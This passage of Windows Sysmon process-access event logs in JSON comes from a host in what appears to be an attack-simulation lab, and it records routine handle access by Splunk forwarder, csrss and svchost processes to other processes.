{41C8662E-203D-5F25-0000-0010E2140600}\r\nTargetProcessId: 4496\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:45.898","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-203D-5F25-0000-0010E2140600}","TargetProcessId":"4496","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4063,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:45.898\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-203D-5F25-0000-0010E2140600}\r\nTargetProcessId: 4496\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:45.898","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-203D-5F25-0000-0010E2140600}","TargetProcessId":"4496","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:56:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4064,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:45.898\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:45.898","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4065,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:45.898\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:45.898","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4066,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:45.898\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:45.898","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4067,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:45.898\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:45.898","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4068,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:45.898\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:45.898","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4069,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:45.898\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:45.898","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4070,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:45.898\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 